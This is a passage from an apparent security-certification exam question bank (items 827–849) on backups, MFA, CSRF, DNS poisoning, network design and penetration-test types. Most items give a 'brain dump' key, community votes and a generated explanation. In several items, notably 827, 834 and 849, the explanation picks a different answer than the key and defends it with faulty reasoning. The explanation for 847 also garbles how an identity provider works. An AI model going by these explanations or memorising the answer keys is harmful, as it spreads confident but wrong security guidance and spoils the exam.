Image backups: An image backup captures a complete snapshot of the entire system, including the operating system, applications, settings, and data. It essentially creates a mirror image of the system at a specific point in time. This type of backup is crucial for disaster recovery because it allows for quick and comprehensive restoration of the entire system onto new or repaired hardware.

Other Options Considered:
    Incremental backups (Option A): Incremental backups only capture changes made since the last backup (whether full or incremental). While efficient for storage space, they require the full backup and all subsequent incremental backups to fully restore a system, which may not be ideal for rapid disaster recovery.
    Storage Area Network (SAN) (Option B): SAN is a storage infrastructure rather than a backup type. It provides high-speed access to storage devices across a network but does not inherently address disaster recovery.
    Differential backups (Option C): Differential backups capture changes made since the last full backup. While they can be faster to restore than incremental backups, they still require the original full backup to fully restore the system.

Therefore, D. Image backups are the best choice for ensuring comprehensive system recovery, including the operating system, in case of a disaster.

827
Q

An administrator is investigating an incident and discovers several users’ computers were infected with malware after viewing files that were shared with them. The administrator discovers no degraded performance in the infected machines and an examination of the log files does not show excessive failed logins. Which of the following attacks is most likely the cause of the malware?

A. Malicious flash drive
B. Remote access Trojan
C. Brute-forced password
D. Cryptojacking

A

(Brain dump: B. Remote access Trojan)
(Community : B 70%, A 30%)
B. Remote access Trojan

ChatGPT
A. Malicious flash drive

Here’s why:

No degraded performance: Malware introduced via a malicious flash drive may not immediately degrade system performance. Instead, it could remain dormant or operate stealthily, avoiding detection while executing malicious activities in the background.

No excessive failed logins: Malware introduced through other means like brute-forcing passwords or using remote access Trojans typically leaves traces such as failed login attempts in log files. The absence of such logs suggests that these methods are less likely.

Shared files as infection vector: If users received files that were infected via a malicious flash drive and then shared them, this could easily propagate malware across multiple machines without immediately triggering noticeable performance issues or generating unusual log entries related to failed logins.

Therefore, considering the lack of degraded performance and absence of excessive failed logins in the log files, A. Malicious flash drive is the most likely cause of the malware infection described in the incident investigation.

828
Q

A security analyst discovers that a large number of employee credentials had been stolen and were being sold on the dark web. The analyst investigates and discovers that some hourly employee credentials were compromised, but salaried employee credentials were not affected.

Most employees clocked in and out while they were inside the building using one of the kiosks connected to the network. However, some clocked out and recorded their time after leaving to go home. Only those who clocked in and out while inside the building had credentials stolen. Each of the kiosks are on different floors, and there are multiple routers, since the business segments environments for certain business functions.

Hourly employees are required to use a website called acmetimekeeping.com to clock in and out. This website is accessible from the internet. Which of the following is the most likely reason for this compromise?

A. A brute-force attack was used against the time-keeping website to scan for common passwords.
B. A malicious actor compromised the time-keeping website with malicious code using an unpatched vulnerability on the site, stealing the credentials.
C. The internal DNS servers were poisoned and were redirecting acmetimekeeping.com to a malicious domain that intercepted the credentials and then passed them through to the real site.
D. ARP poisoning affected the machines in the building and caused the kiosks to send a copy of all the submitted credentials to a malicious machine.

A

C. The internal DNS servers were poisoned and were redirecting acmetimekeeping.com to a malicious domain that intercepted the credentials and then passed them through to the real site.

Here’s why:

Hourly employees affected: Only those employees who clocked in and out while inside the building had their credentials stolen. This suggests that the compromise occurred within the internal network environment.

Usage of acmetimekeeping.com: The time-keeping website acmetimekeeping.com is accessible from the internet. If internal DNS servers were poisoned, they could have been redirecting requests for acmetimekeeping.com to a malicious domain controlled by attackers.

DNS poisoning: DNS poisoning involves attackers corrupting or compromising DNS data stored on DNS servers. By poisoning the internal DNS servers, attackers can redirect legitimate requests to malicious websites controlled by them. In this case, they could redirect requests for acmetimekeeping.com to a malicious site that captures employee credentials when they log in to clock their time.

No mention of external compromise: There is no indication in the scenario that the external acmetimekeeping.com website itself was compromised. Instead, the compromise seems to have occurred within the internal network, affecting those who used the kiosks connected to the network.

Therefore, C. The internal DNS servers were poisoned is the most likely reason for the compromise of hourly employee credentials in this scenario.

829
Q

The Chief Information Security Officer of an organization needs to ensure recovery from ransomware would likely occur within the organization’s agreed-upon RPOs and RTOs. Which of the following backup scenarios would best ensure recovery?

A. Hourly differential backups stored on a local SAN array
B. Daily full backups stored on premises in magnetic offline media
C. Daily differential backups maintained by a third-party cloud provider
D. Weekly full backups with daily incremental stored on a NAS drive

A

B. Daily full backups stored on premises in magnetic offline media
Explanation:

Daily full backups: Full backups capture all data and provide a complete snapshot of the system's state at the time of backup. In the event of ransomware, where data encryption could compromise incremental or differential backups, having daily full backups ensures that the latest unencrypted data snapshot is available for restoration.

Stored on premises in magnetic offline media: Storing backups offline on magnetic media (such as tapes) ensures they are isolated from the network and inaccessible to ransomware attackers. This protects the backups from being encrypted or tampered with during an attack.

Comparison with other options:

Hourly differential backups stored on a local SAN array: Differential backups capture changes since the last full backup. However, frequent backups may still capture encrypted data if ransomware is active. SAN arrays are typically connected and vulnerable to ransomware attacks.

Daily differential backups maintained by a third-party cloud provider: While cloud backups can provide off-site storage and redundancy, the risk remains if the backups are not isolated from the network or if the cloud provider's infrastructure is compromised.

Weekly full backups with daily incremental stored on a NAS drive: Weekly full backups combined with daily incremental backups may provide some level of recovery capability, but it relies heavily on the integrity of incremental backups, which can be affected by ransomware encryption.

Therefore, option B, Daily full backups stored on premises in magnetic offline media, offers the best combination of comprehensive data capture and protection against ransomware attacks, aligning well with ensuring recovery within the organization’s RPOs and RTOs.

830
Q

A company is currently utilizing usernames and passwords, and it wants to integrate an MFA method that is seamless, can integrate easily into a user’s workflow, and can utilize employee-owned devices. Which of the following will meet these requirements?

A. Push notifications
B. Phone call
C. Smart card
D. Offline backup codes

A

A. Push notifications

Push notifications for MFA typically involve sending a notification to a user’s mobile device or application, prompting them to approve or deny access. Here’s how it meets the requirements:

Seamless integration: Push notifications are often integrated into existing applications or services, allowing users to approve access requests with a simple tap on their mobile device. This process is intuitive and does not disrupt the user’s workflow significantly.

Integration with employee-owned devices: Push notifications can be sent to employee-owned smartphones or tablets, leveraging devices that users are already familiar with and likely have readily available.

Ease of use: Users can respond to push notifications quickly and without the need to manually enter codes or carry additional hardware tokens (as required by options like smart cards).

Why not the other options?

B. Phone call: Phone call-based MFA requires answering a call and entering a PIN or confirming access verbally. This process can be more disruptive and less seamless compared to push notifications.

C. Smart card: Smart cards require physical possession and insertion into a reader, which is less convenient for users, especially with employee-owned devices that may not have smart card readers.

D. Offline backup codes: Offline backup codes are typically used as a backup option rather than a primary MFA method. They require users to store and manage codes securely, which may not integrate as seamlessly into daily workflows as push notifications.

Therefore, A. Push notifications best meets the company’s requirements for seamless integration, easy integration with employee-owned devices, and user-friendly MFA implementation.

831
Q

Since a recent upgrade to a WLAN infrastructure, several mobile users have been unable to access the internet from the lobby. The networking team performs a heat map survey of the building and finds several WAPs in the area. The WAPs are using similar frequencies with high power settings. Which of the following installation considerations should the security team evaluate next?

A. Channel overlap
B. Encryption type
C. New WLAN deployment
D. WAP placement

A

A. Channel overlap

Here’s why channel overlap is the key consideration:

Frequency Interference: When multiple WAPs operate on similar frequencies with high power settings, they can cause interference, leading to degraded performance and connectivity issues for mobile users. This interference is primarily due to channels overlapping, where adjacent or nearby WAPs transmit on frequencies that interfere with each other.

Optimizing Channel Allocation: The security team should assess the current channel allocation of the WAPs in the lobby area. They may need to adjust the channels used by each WAP to minimize overlap and reduce interference. This can be achieved through a site survey or by using tools that analyze and recommend optimal channel configurations based on observed interference patterns.

Performance Impact: Channel overlap not only affects internet access but also impacts overall WLAN performance and reliability. By addressing channel overlap, the security team can improve the quality of service for mobile users and ensure that WLAN infrastructure operates efficiently.

Why not the other options?

B. Encryption type: Encryption type relates to securing wireless communications but does not directly address the issue of WLAN performance degradation caused by channel overlap.

C. New WLAN deployment: This option suggests a complete overhaul or deployment of a new WLAN infrastructure, which is not necessary if the issue can be mitigated by optimizing channel usage.

D. WAP placement: While WAP placement is important for coverage and signal strength, in this scenario, the issue is more likely due to channel interference rather than placement.

Therefore, A. Channel overlap is the most relevant consideration for the security team to evaluate next to resolve the connectivity issues faced by mobile users in the lobby area.

832
Q

A security administrator needs to publish multiple application URLs that will run on different internal web servers but use only one external IP address. Which of the following is the best way for the administrator to achieve this goal?

A. Jump server
B. Reverse proxy
C. MAC filtering
D. Source NAT

A

B. Reverse proxy

Here’s why a reverse proxy is the appropriate choice:

Routing and Load Balancing: A reverse proxy can route incoming requests based on the URL path or domain name to different internal web servers hosting different applications. This allows multiple applications to be accessed using different URLs but through a single external IP address.

Centralized Management: A reverse proxy provides a centralized point for managing and securing incoming traffic. It can handle SSL termination, caching, and other optimizations, improving performance and security for the applications.

Simplicity and Scalability: Implementing a reverse proxy is straightforward and scales well as additional applications or servers are added. It simplifies external access and enhances security by keeping internal server details hidden.

Why not the other options?

A. Jump server: A jump server is typically used for secure access to internal resources from an external network, but it does not provide the URL-based routing capability needed to publish multiple applications using a single external IP address.

C. MAC filtering: MAC filtering operates at the data link layer (Layer 2) and is used to control which devices can connect to a network based on their MAC addresses. It does not provide URL-based routing or allow multiple applications to share a single external IP address.

D. Source NAT (Network Address Translation): Source NAT translates internal IP addresses to a single external IP address, but it does not provide URL-based routing capabilities. It would require separate external IP addresses for each internal web server hosting different applications, which does not meet the requirement of using only one external IP address.

Therefore, B. Reverse proxy is the best choice for the security administrator to publish multiple application URLs from different internal web servers using a single external IP address efficiently and securely.

833
Q

Which of the following is the first step to take when creating an anomaly detection process?

A. Selecting events
B. Building a baseline
C. Selecting logging options
D. Creating an event log

A

B. Building a baseline

Here’s why building a baseline is the initial step:

Establishing Normal Behavior: Before detecting anomalies, it's crucial to understand what constitutes normal behavior within your system or network. Building a baseline involves collecting data over a period to establish patterns of typical activity. This baseline serves as a reference point against which future events can be compared.

Identifying Deviations: Once a baseline is established, deviations from this normal behavior can be identified as potential anomalies. These anomalies can indicate suspicious or malicious activities that may require further investigation.

Foundation for Detection Rules: The baseline helps in setting thresholds and creating detection rules for anomaly detection systems. It allows for the customization of alerts or triggers based on predefined deviations from normal behavior.

Why not the other options?

A. Selecting events: This step comes after establishing a baseline. Selecting events involves determining which events or data points are relevant to monitor based on the established baseline.

C. Selecting logging options: Logging options relate to configuring what data is logged and how it's stored, which is important but typically follows establishing a baseline to know what to log.

D. Creating an event log: Creating an event log is a necessary step in logging and monitoring, but it assumes you already know what events to log, which is informed by the baseline.

Therefore, B. Building a baseline is the critical first step when creating an anomaly detection process, as it provides the foundation for identifying and responding to deviations from normal system behavior.

834
Q

When a newly developed application was tested, a specific internal resource was unable to be accessed. Which of the following should be done to ensure the application works correctly?

A. Modify the allow/deny list for those specific resources.
B. Follow the secure coding practices for the internal resource.
C. Configure the application in a sandbox environment.
D. Utilize standard network protocols.

A

(Brain dump: A. Modify the allow/deny list for those specific resources.)
(Community A 86% )

If a newly developed application is unable to access a specific internal resource during testing, it may be necessary to modify the allow/deny list to ensure that the application has the necessary permissions to access that resource. The allow/deny list typically controls which resources or entities are allowed or denied access by the application. Adjusting the allow/deny list can help resolve access issues and ensure that the application works correctly

D. Utilize standard network protocols.

Here’s why this is the correct choice:

Standardization: Using standard network protocols ensures that the application communicates with internal resources in a way that is universally recognized and supported. This reduces compatibility issues that may arise due to non-standard protocols or configurations.

Interoperability: Standard protocols like HTTP/HTTPS, TCP/IP, FTP, etc., are designed to facilitate communication between applications and resources across different platforms and environments. They ensure that data can be transmitted and received correctly without compatibility issues.

Troubleshooting: Standard protocols have well-documented specifications and troubleshooting guides, making it easier to diagnose and resolve connectivity issues between the application and internal resources.

Why not the other options?

A. Modify the allow/deny list for those specific resources: Modifying allow/deny lists typically pertains to access control policies, which may be necessary but are more about permission settings rather than ensuring the application can correctly access an internal resource.

B. Follow the secure coding practices for the internal resource: Secure coding practices are essential for developing applications that are resistant to security threats, but they do not directly address connectivity issues between the application and internal resources.

C. Configure the application in a sandbox environment: Sandboxing is a method used for testing and isolating applications, but it's not directly related to ensuring correct access to internal resources. It's more about testing the application's behavior in a controlled environment.

Therefore, D. Utilize standard network protocols is the most appropriate action to ensure that the newly developed application can access the specific internal resource correctly, by ensuring compatibility and proper communication protocols are followed.

835
Q

Which of the following best describes why the SMS OTP authentication method is more risky to implement than the TOTP method?

A. The SMS OTP method requires an end user to have an active mobile telephone service and SIM card.
B. Generally, SMS OTP codes are valid for up to 15 minutes, while the TOTP time frame is 30 to 60 seconds.
C. The SMS OTP is more likely to be intercepted and lead to unauthorized disclosure of the code than the TOTP method.
D. The algorithm used to generate an SMS OTP code is weaker than the one used to
generate a TOTP code.

A

C. The SMS OTP is more likely to be intercepted and lead to unauthorized disclosure of the code than the TOTP method.

Here’s why:

SMS Interception Risk: SMS OTP codes are sent via text messages, which travel through the cellular network. These messages can potentially be intercepted through various means, such as SIM swapping attacks, SS7 vulnerabilities, or malware on the user's device. Once intercepted, the OTP code can be used by an attacker to gain unauthorized access.

TOTP Advantage: Time-based One-Time Passwords (TOTP), on the other hand, generate codes locally on the user's device using a shared secret and the current time. These codes are typically valid for a shorter duration (e.g., 30 seconds to 1 minute) and are not transmitted over the network, reducing the risk of interception compared to SMS.

Why not the other options?

A. The SMS OTP method requires an end user to have an active mobile telephone service and SIM card: While true, this requirement is more about the availability of mobile service rather than the security risk associated with SMS OTP.

B. Generally, SMS OTP codes are valid for up to 15 minutes, while the TOTP time frame is 30 to 60 seconds: The validity period of OTP codes does influence security, but it does not inherently make SMS OTP riskier than TOTP.

D. The algorithm used to generate an SMS OTP code is weaker than the one used to generate a TOTP code: Both SMS OTP and TOTP can use strong cryptographic algorithms. The difference lies more in the transmission and interception risks rather than the algorithm strength.

Therefore, C. The SMS OTP is more likely to be intercepted and lead to unauthorized disclosure of the code than the TOTP method accurately describes the security risk associated with using SMS OTP for authentication.

836
Q

A security manager is implementing MFA and patch management. Which of the following would best describe the control type and category? (Choose two.)

A. Physical
B. Managerial
C. Detective
D. Administrative
E. Preventative
F. Technical

A

E. Preventative
F. Technical

Preventative (E):

MFA: Multi-Factor Authentication is a preventative control because it aims to prevent unauthorized access even if credentials are compromised.
Patch Management: Ensuring systems are up-to-date with patches prevents vulnerabilities from being exploited.

Technical (F):

MFA: Multi-Factor Authentication is a technical control as it involves implementing software or hardware mechanisms to enhance security.
Patch Management: This also falls under technical controls as it involves deploying and maintaining software and configurations to protect systems.
837
Q

A security analyst is creating baselines for the server team to follow when hardening new devices for deployment. Which of the following best describes what the analyst is creating?

A. Change management procedure
B. Information security policy
C. Cybersecurity framework
D. Secure configuration guide

A

D. Secure configuration guide

Explanation:

A secure configuration guide outlines the recommended settings and configurations that should be applied to devices or systems to enhance their security posture. It provides a baseline configuration that ensures consistency and reduces vulnerabilities across deployed devices. This guide helps the server team in hardening new devices by specifying security settings, access controls, software configurations, and other measures to mitigate potential risks.

Here’s why the other options are not as suitable:

A. Change management procedure: This refers to a formal process for managing changes to IT systems, not specifically the creation of security baselines.

B. Information security policy: This defines high-level requirements and expectations for security within an organization, not specific configuration settings.

C. Cybersecurity framework: This provides a structured approach to cybersecurity, including guidelines, standards, and best practices, but it is broader than just creating secure configurations for devices.

Therefore, D. Secure configuration guide best describes what the security analyst is creating in this scenario.

838
Q

Which of the following environments utilizes a subset of customer data and is most likely to be used to assess the impacts of major system upgrades and demonstrate system features?

A. Development
B. Test
C. Production
D. Staging

A

D. Staging
Explanation:

Staging environment: This environment is designed to mirror the production environment as closely as possible. It typically uses a subset of real customer data to accurately simulate the production environment. The staging environment is used to test major system upgrades, demonstrate system features, and perform final checks before changes are deployed to production.

Why other options may not be suitable:

Development environment: This environment is primarily used for coding and initial testing by developers. It usually contains mock data rather than real or subset customer data, and its primary purpose is to build and debug new features.

Test environment: Similar to the development environment, the test environment is used for more rigorous testing but usually with test data. It might be used for functional, integration, and performance testing, but it doesn’t typically mirror the production environment as closely as staging.

Production environment: This is the live environment where the actual end-users interact with the system. It contains full customer data and is not used for testing purposes.

Therefore, the staging environment is the most appropriate choice for assessing the impacts of major system upgrades and demonstrating system features using a subset of customer data.

839
Q

An external vendor recently visited a company’s headquarters for a presentation. Following the visit, a member of the hosting team found a file that the external vendor left behind on a server. The file contained detailed architecture information and code snippets. Which of the following data types best describes this file?

A. Government
B. Public
C. Proprietary
D. Critical

A

C. Proprietary

Explanation:

Government: Typically refers to information related to governmental entities or operations.
Public: Information that is freely accessible to anyone, such as public records or non-sensitive data.
Proprietary: Refers to information that is owned by a company or organization, not publicly available, and typically protected as confidential or trade secret.
Critical: Often used to describe systems, operations, or data that are crucial to an organization's functioning or security, but not typically used to describe the confidentiality status of information.

Given that the file left behind by the external vendor contained detailed architecture information and code snippets, which are likely considered confidential and proprietary to the company, C. Proprietary best describes the data type of this file.

840
Q

An organization has too many variations of a single operating system and needs to standardize the arrangement prior to pushing the system image to users. Which of the following should the organization implement first?

A. Standard naming convention
B. Hashing
C. Network diagrams
D. Baseline configuration

A

D. Baseline configuration
Explanation:

Baseline configuration: This step involves establishing a standard set of configurations for the operating system that will be used across the organization. It ensures consistency, security, and manageability. By defining a baseline configuration, the organization can create a standardized image that can be deployed to all users, reducing variations and ensuring that all systems meet the same standards.

Why other options may not be suitable:

Standard naming convention: This is important for managing and identifying systems but does not address the variations in the operating system configurations themselves.

Hashing: Hashing is used to ensure data integrity and verify that files have not been altered. It does not help in standardizing operating system configurations.

Network diagrams: These are useful for understanding and managing the network infrastructure but do not contribute to standardizing operating system configurations.

Therefore, implementing a baseline configuration is the most appropriate first step to standardize the arrangement of the operating system prior to pushing the system image to users.

841
Q

The Chief Information Security Officer (CISO) asks a security analyst to install an OS update to a production VM that has a 99% uptime SLA. The CISO tells the analyst the installation must be done as quickly as possible. Which of the following courses of action should the security analyst take first?

A. Log in to the server and perform a health check on the VM.
B. Install the patch immediately.
C. Confirm that the backup service is running.
D. Take a snapshot of the VM.

A

D. Take a snapshot of the VM.
Explanation:

Take a snapshot of the VM: This action creates a point-in-time backup of the VM, allowing for a quick rollback if the update causes any issues. It ensures that the system can be restored to its previous state without significant downtime, aligning with the 99% uptime SLA.

Why other options are secondary:

Log in to the server and perform a health check on the VM: While it's important to ensure the VM is healthy before applying updates, this step is not as crucial as taking a snapshot for quick recovery purposes.

Install the patch immediately: Installing the patch without a backup or snapshot could be risky. If the update causes issues, it could result in significant downtime.

Confirm that the backup service is running: While ensuring backups are in place is important, taking a snapshot is a more immediate and reliable way to protect against potential issues during the update process.

Therefore, the security analyst should first take a snapshot of the VM to ensure there is a quick and reliable way to recover if the update causes any problems.

842
Q

The application development teams have been asked to answer the following questions:

  • Does this application receive patches from an external source?
  • Does this application contain open-source code?
  • Is this application accessible by external users?
  • Does this application meet the corporate password standard?

Which of the following are these questions part of?

A. Risk control self-assessment
B. Risk management strategy
C. Risk acceptance
D. Risk matrix

A

A. risk control self-assessment (RCSA).

Risk control self-assessment (RCSA) involves evaluating various aspects of risks associated with a specific activity, process, or system within an organization. It typically involves asking specific questions to assess the effectiveness of controls in place, identify vulnerabilities, and determine compliance with policies and standards.

In this case:

Questions about patch management and use of open-source code address potential vulnerabilities related to software updates and code security.
The question about external accessibility assesses exposure to external threats and security measures.
The query about corporate password standards focuses on compliance with internal security policies and standards.

Therefore, A. Risk control self-assessment (RCSA) accurately describes the process of evaluating these aspects to manage and mitigate risks effectively within the organization.

843
Q

A website user is locked out of an account after clicking an email link and visiting a different website. Web server logs show the user’s password was changed, even though the user did not change the password. Which of the following is the most likely cause?

A. Cross-site request forgery
B. Directory traversal
C. ARP poisoning
D. SQL injection

A

A. Cross-site request forgery (CSRF).

Cross-site request forgery (CSRF) occurs when an attacker tricks a user into unknowingly making a request on a different website where the user is authenticated. In this case, if the user was logged into the website and then visited a different site that exploited CSRF, the attacker could have initiated a request to change the password on the original website without the user’s consent or knowledge.

Here’s how CSRF typically works in this context:

The attacker crafts a malicious link or script that, when accessed by the user (e.g., via clicking on a link in an email), sends a forged HTTP request to the vulnerable website.
If the user is authenticated (logged in) to the website where the request is being sent (due to persistent cookies or sessions), the website might mistakenly process the request as if it came from the user themselves.
In this scenario, the forged request could be to change the user's password, which the vulnerable website processes as a legitimate action initiated by the user.

Therefore, A. Cross-site request forgery (CSRF) is the most likely cause of the user’s password being changed without their explicit action.

844
Q

Two companies are in the process of merging. The companies need to decide how to standardize their information security programs. Which of the following would best align the security programs?

A. Shared deployment of CIS baselines
B. Joint cybersecurity best practices
C. Both companies following the same CSF
D. Assessment of controls in a vulnerability report

A

C. Both companies following the same CSF (Cybersecurity Framework)

Here’s why:

Cybersecurity Framework (CSF): Adopting the same framework ensures a unified approach to cybersecurity across both organizations. Frameworks like NIST Cybersecurity Framework (CSF), ISO/IEC 27001, or others provide comprehensive guidelines and best practices for managing cybersecurity risks. By following the same framework, both companies can establish common goals, processes, and controls that are recognized and understood across the merged entity.

Standardization: Using a common framework allows for the standardization of security policies, procedures, and controls. This helps in streamlining security operations, reducing redundancies, and ensuring consistency in security practices.

Integration and Merging: As the companies merge, aligning with the same CSF facilitates easier integration of systems, processes, and personnel. It provides a structured approach to assess and improve cybersecurity posture collectively.

While options like shared deployment of CIS baselines (A), joint cybersecurity best practices (B), and assessment of controls in a vulnerability report (D) are beneficial, they may not offer the comprehensive framework and structured approach to standardizing information security programs that a Cybersecurity Framework provides. Thus, C. Both companies following the same CSF ensures a strategic alignment of security efforts during and after the merger process.

845
Q

A company recently decided to allow employees to work remotely. The company wants to protect its data without using a VPN. Which of the following technologies should the company implement?

A. Secure web gateway
B. Virtual private cloud endpoint
C. Deep packet inspection
D. Next-generation firewall

A

A. Secure web gateway.

Here’s why:

Secure Web Gateway: A secure web gateway provides secure access to web-based applications and services. It can enforce policies for web traffic, including URL filtering, content inspection, malware detection, and data loss prevention (DLP). For remote workers accessing company resources over the internet, a secure web gateway can ensure that data is protected through encrypted connections and by filtering out malicious content and threats.

Virtual Private Cloud Endpoint: While this option might provide secure access to cloud resources, it typically complements rather than replaces VPNs for remote access.

Deep Packet Inspection: This technology inspects data packets at a deep level but is usually part of a firewall or network intrusion prevention system, not typically used solely for remote access without VPN.

Next-Generation Firewall: Although capable of advanced security features, it is primarily used to protect network perimeters and enforce security policies within the network, rather than for remote access without VPN.

Therefore, A. Secure web gateway is the most appropriate choice for enabling secure remote work without relying on a VPN, by ensuring secure access to web-based resources and applications while protecting company data from external threats.

846
Q

A vendor needs to remotely and securely transfer files from one server to another using the command line. Which of the following protocols should be implemented to allow for this type of access? (Choose two.)

A. SSH
B. SNMP
C. RDP
D. S/MIME
E. SMTP
F. SFTP

A

A. SSH and F. SFTP

SSH (Secure Shell): SSH provides encrypted communication sessions over an insecure network. It is commonly used for secure remote access to systems and also supports secure file transfer through utilities like SCP (Secure Copy) and SFTP (SSH File Transfer Protocol).

SFTP (SSH File Transfer Protocol): SFTP is a secure file transfer protocol that operates over SSH. It provides secure file access, transfer, and management functionalities over a reliable data stream.

Therefore, the correct choices are A. SSH and F. SFTP. These protocols ensure secure remote access and file transfer operations between servers.

847
Q

A security analyst needs to propose a remediation plan for each item in a risk register. The item with the highest priority requires employees to have separate logins for SaaS solutions and different password complexity requirements for each solution. Which of the following implementation plans will most likely resolve this security issue?

A. Creating a unified password complexity standard
B. Integrating each SaaS solution with the identity provider
C. Securing access to each SaaS by using a single wildcard certificate
D. Configuring geofencing on each SaaS solution

A

B. Integrating each SaaS solution with the identity provider

Here’s why this option is the best choice:

Centralized Identity Management: Integrating each SaaS solution with the identity provider (IdP) allows for centralized management of user identities and access policies.

Single Sign-On (SSO): With SSO integration, employees can use a single set of credentials to access multiple SaaS applications. This enhances user experience while maintaining security by enforcing strong authentication policies set by the identity provider.

Password Complexity Enforcement: The identity provider can enforce different password complexity requirements for each SaaS application based on organizational policies. This ensures that each application adheres to its specific security requirements without burdening users with multiple passwords.

In contrast, the other options do not directly address the need for separate logins and varying password complexity requirements across multiple SaaS solutions. Therefore, B. Integrating each SaaS solution with the identity provider is the most appropriate remediation plan for this scenario.

848
Q

Callers speaking a foreign language are using company phone numbers to make unsolicited phone calls to a partner organization. A security analyst validates through phone system logs that the calls are occurring and the numbers are not being spoofed. Which of the following is the most likely explanation?

A. The executive team is traveling internationally and trying to avoid roaming charges.
B. The company’s SIP server security settings are weak.
C. Disgruntled employees are making calls to the partner organization.
D. The service provider has assigned multiple companies the same numbers

A

B. The company’s SIP server security settings are weak.
Explanation:

The company’s SIP server security settings are weak: This is the most likely explanation because weak security settings on the SIP (Session Initiation Protocol) server could allow unauthorized access to the company's phone system. If the SIP server is not properly secured, malicious actors could exploit it to make unsolicited calls using the company's phone numbers. This scenario fits with the fact that the calls are validated as occurring and the numbers are not spoofed.

Why other options are less likely:

The executive team is traveling internationally and trying to avoid roaming charges: While possible, it is less likely to result in unsolicited calls to a partner organization in a foreign language. This explanation doesn't align well with the nature of the unsolicited calls.

Disgruntled employees are making calls to the partner organization: While possible, this would likely be discovered quickly and would not necessarily involve foreign language calls unless the disgruntled employees specifically spoke that language and had a motive to do so.

The service provider has assigned multiple companies the same numbers: This would be a serious error by the service provider and is highly unlikely. It would also likely lead to a broader set of issues than just unsolicited calls to a partner organization.

Therefore, weak SIP server security settings are the most plausible cause, as it explains how unauthorized callers could use the company’s phone system without spoofing the numbers.

849
Q

Which of the following best describes a penetration test that resembles an actual external attack?

A. Known environment
B. Partially known environment
C. Bug bounty
D. Unknown environment

A

(Brain dump: D. Unknown environment)

B. Partially known environment

Explanation:

A penetration test that resembles an actual external attack typically occurs in a scenario where the tester has a partially known environment. This means that the tester has some basic information about the target organization or system but lacks complete insider knowledge. This approach helps simulate how a real attacker would gather initial reconnaissance information and attempt to exploit vulnerabilities. It allows the penetration tester to assess the effectiveness of security controls and response mechanisms under conditions that closely mimic those of a genuine external threat.